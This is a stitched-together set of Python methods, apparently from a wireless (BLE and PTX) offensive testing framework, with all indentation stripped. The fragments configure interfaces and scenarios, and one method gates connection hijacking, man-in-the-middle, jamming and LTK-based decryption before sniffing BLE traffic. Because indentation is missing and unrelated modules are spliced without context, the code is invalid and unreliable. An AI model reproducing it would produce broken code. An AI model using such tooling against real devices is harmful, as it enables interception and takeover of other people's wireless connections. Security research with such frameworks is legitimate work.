self.emitter = self.getEmitter(interface=self.args['INTERFACE'])
self.receiver = self.getReceiver(interface=self.args['INTERFACE'])
self.ack = False
self.ackLock = Lock()
self.followThread = None
self.currentChannel = self.emitter.getChannel()
self.initializeCallbacks()
if self.checkCommunicationCapabilities():
if self.args["TARGET"] != "":
self.emitter.enterSnifferMode(self.args["TARGET"])
self.target = self.args["TARGET"].upper()
self.updatePrompt(self.target)
if utils.booleanArg(self.args["FOLLOW_MODE"]):
io.info("Enabling following mode ...")
self.startFollowing()
else:
self.updatePrompt()
if self.loadScenario():
self.scenarioStop = False
io.info("Scenario loaded !")
self.startScenario()
while not self.scenarioStop:
utils.wait(seconds=0.1)
self.endScenario()
else:
interpreter.Interpreter.loop(self)
self.stopFollowing()
return self.ok()
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to communicate as a PTX device.")
return self.nok()
def onStart(self):
if 'REQUESTS' in self.module.args and utils.integerArg(
self.module.args['REQUESTS'], 0) > 0:
self.requests = utils.integerArg(self.module.args['REQUESTS'])
else:
self.requests = MOCK_VALUES['control']['number_requests']
if 'INTERVAL' in self.module.args and utils.integerArg(
self.module.args['INTERVAL'], 0) > 0:
self.interval = utils.integerArg(self.module.args['INTERVAL'])
else:
self.interval = MOCK_VALUES['control']['request_time_interval']
if 'PAIRING' in self.module.args:
self.pairing = utils.booleanArg(self.module.args['PAIRING'])
else:
self.pairing = MOCK_VALUES['control']['enable_pairing']
if 'TARGET' in self.module.args and self.module.args['TARGET'] != '':
self.target = self.module.args['TARGET']
io.info('Provided target at ' + self.target)
self.customConnect()
else:
self.target = ""
if 'NAME' in self.module.args and self.module.args['NAME'] != '':
self.searchFor = self.module.args['NAME']
else:
self.searchFor = MOCK_VALUES['gap']['localName']
self.module.receiver.onEvent("BLEAdvertisement",
callback=self.onAdvertisement)
self.module.receiver.setScan(enable=True)
io.info('Scanning for slave named "' + self.searchFor + '"')
return True
def run(self):
if self.args["PCAP_FILE"] != "":
self.pcap = self.getEmitter(self.args["PCAP_FILE"])
else:
self.pcap = None
self.initEmittersAndReceivers()
if self.args["LTK"] != "":
ble.BLELinkLayerCrypto.provideLTK(bytes.fromhex(self.args["LTK"]))
if utils.booleanArg(self.args["HIJACKING_MASTER"]) and not self.checkHijackingMasterCapabilities():
io.fail("Interfaces provided are not able to hijack a master role.")
return self.nok()
if utils.booleanArg(self.args["HIJACKING_SLAVE"]) and not self.checkHijackingSlaveCapabilities():
io.fail("Interfaces provided are not able to hijack a slave role.")
return self.nok()
if utils.booleanArg(self.args["MITMING"]) and not self.checkMitmingCapabilities():
io.fail("Interfaces provided are not able to MITM an established connection.")
return self.nok()
if utils.booleanArg(self.args["JAMMING"]) and not self.checkJammingCapabilities():
io.fail("Interfaces provided are not able to jam a connection.")
return self.nok()
if self.args["SNIFFING_MODE"] not in ("newConnections", "advertisements", "existingConnections"):
io.fail("You have to set SNIFFING_MODE parameters to: 'newConnections', 'advertisements' or 'existingConnections'")
return self.nok()
if self.args["SNIFFING_MODE"].upper() == "newConnections".upper():
if self.checkNewConnectionCapabilities():
target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
if self.loadScenario():
io.info("Scenario loaded !")
self.startScenario()
result = self.sniffNewConnections(target, utils.integerArg(self.args["CHANNEL"]))
if self.scenarioEnabled:
self.endScenario()
return result
else:
io.fail("Interfaces provided are not able to sniff new connections.")
return self.nok()
elif self.args["SNIFFING_MODE"].upper() == "existingConnections".upper():
if self.checkExistingConnectionCapabilities():
if self.loadScenario():
io.info("Scenario loaded !")
self.startScenario()
accessAddress = utils.integerArg(self.args["ACCESS_ADDRESS"]) if self.args["ACCESS_ADDRESS"]!="" else None
crcInit = utils.integerArg(self.args["CRC_INIT"]) if self.args["CRC_INIT"]!="" else None
channelMap = utils.integerArg(self.args["CHANNEL_MAP"]) if self.args["CHANNEL_MAP"]!="" else None
result = self.sniffExistingConnections(self.receivers[0], accessAddress, crcInit, channelMap)
if self.scenarioEnabled:
self.endScenario()
return result
else:
io.fail("Interfaces provided are not able to sniff existing connections.")
return self.nok()
elif self.args["SNIFFING_MODE"].upper() == "advertisements".upper():
if self.checkAdvertisementsCapabilities():
if self.loadScenario():
io.info("Scenario loaded !")
self.startScenario()
target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
result = self.sniffAdvertisements(target, utils.integerArg(self.args["CHANNEL"]))
if self.scenarioEnabled:
self.endScenario()
return result
else:
io.fail("Interfaces provided are not able to sniff advertisements.")
return self.nok()
return self.ok()
